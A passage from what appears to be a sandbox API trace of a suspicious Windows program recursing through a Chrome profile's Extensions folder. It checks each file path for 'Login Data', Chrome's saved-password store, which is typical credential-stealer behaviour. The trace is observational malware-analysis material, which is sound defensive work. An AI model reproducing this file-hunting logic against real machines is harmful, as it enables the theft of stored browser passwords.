(HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x9256c8 [0161.496] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" [0161.496] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\" [0161.496] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned 87 [0161.496] lstrlenW (lpString="aapocclcgogkmnckokdopfmhonfmgoek") returned 32 [0161.496] GetProcessHeap () returned 0x8e0000 [0161.496] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf0) returned 0x925780 [0161.497] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\" [0161.497] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\", lpString2="aapocclcgogkmnckokdopfmhonfmgoek" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" [0161.497] VirtualQuery (in: lpAddress=0x9256c8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.497] GetProcessHeap () returned 0x8e0000 [0161.497] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c8 | out: hHeap=0x8e0000) returned 1 [0161.497] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned 119 [0161.497] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned 119 [0161.497] lstrlenW (lpString="\\*.*") returned 4 [0161.497] GetProcessHeap () returned 0x8e0000 [0161.497] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf8) returned 0x925878 [0161.497] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" [0161.497] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*.*" [0161.497] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*.*", lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b40 [0161.498] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.498] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.498] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.498] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.498] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0.9_0", cAlternateFileName="")) returned 1 [0161.498] lstrcmpiW (lpString1="0.9_0", lpString2=".") returned 1 [0161.498] lstrcmpiW (lpString1="0.9_0", lpString2="..") returned 1 [0161.499] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned 119 [0161.499] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned 119 [0161.499] lstrlenW (lpString="\\") returned 1 [0161.499] GetProcessHeap () returned 0x8e0000 [0161.499] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf2) returned 0x925978 [0161.499] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek" [0161.499] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\" [0161.499] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\") returned 120 [0161.499] lstrlenW (lpString="0.9_0") returned 5 [0161.499] GetProcessHeap () returned 0x8e0000 [0161.499] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfc) returned 0x917cc0 [0161.499] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\" [0161.499] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\", lpString2="0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0161.499] VirtualQuery (in: lpAddress=0x925978, lpBuffer=0x2dee18, dwLength=0x1c | out: lpBuffer=0x2dee18*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.499] GetProcessHeap () returned 0x8e0000 [0161.499] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925978 | out: hHeap=0x8e0000) returned 1 [0161.499] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0161.499] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0161.499] lstrlenW (lpString="\\*.*") returned 4 [0161.499] GetProcessHeap () returned 0x8e0000 [0161.499] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x104) returned 0x925978 [0161.499] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0161.499] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*.*" [0161.499] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*.*", lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b80 [0161.514] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.514] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.514] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.514] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.514] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_128.png", cAlternateFileName="")) returned 1 [0161.514] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0161.514] lstrlenW (lpString="\\") returned 1 [0161.514] GetProcessHeap () returned 0x8e0000 [0161.514] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.514] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0161.514] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.514] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0161.515] lstrlenW (lpString="icon_128.png") returned 12 [0161.515] GetProcessHeap () returned 0x8e0000 [0161.515] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x925a88 [0161.515] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.515] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="icon_128.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" [0161.515] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.515] GetProcessHeap () returned 0x8e0000 [0161.515] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.515] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", lpSrch="Login Data") returned 0x0 [0161.515] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.515] GetProcessHeap () returned 0x8e0000 [0161.515] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0161.515] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_16.png", cAlternateFileName="")) returned 1 [0161.515] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0161.515] lstrlenW (lpString="\\") returned 1 [0161.515] GetProcessHeap () returned 0x8e0000 [0161.515] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.515] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0161.515] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.515] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0161.515] lstrlenW (lpString="icon_16.png") returned 11 [0161.515] GetProcessHeap () returned 0x8e0000 [0161.515] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925a88 [0161.515] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.515] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="icon_16.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" [0161.515] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.515] GetProcessHeap () returned 0x8e0000 [0161.516] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.516] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", lpSrch="Login Data") returned 0x0 [0161.516] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.516] GetProcessHeap () returned 0x8e0000 [0161.516] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0161.516] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b74730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.html", cAlternateFileName="MAIN~1.HTM")) returned 1 [0161.516] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0161.516] lstrlenW (lpString="\\") returned 1 [0161.516] GetProcessHeap () returned 0x8e0000 [0161.516] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.516] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0161.516] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.516] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0161.516] lstrlenW (lpString="main.html") returned 9 [0161.516] GetProcessHeap () returned 0x8e0000 [0161.516] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925a88 [0161.516] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.516] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="main.html" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" [0161.516] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 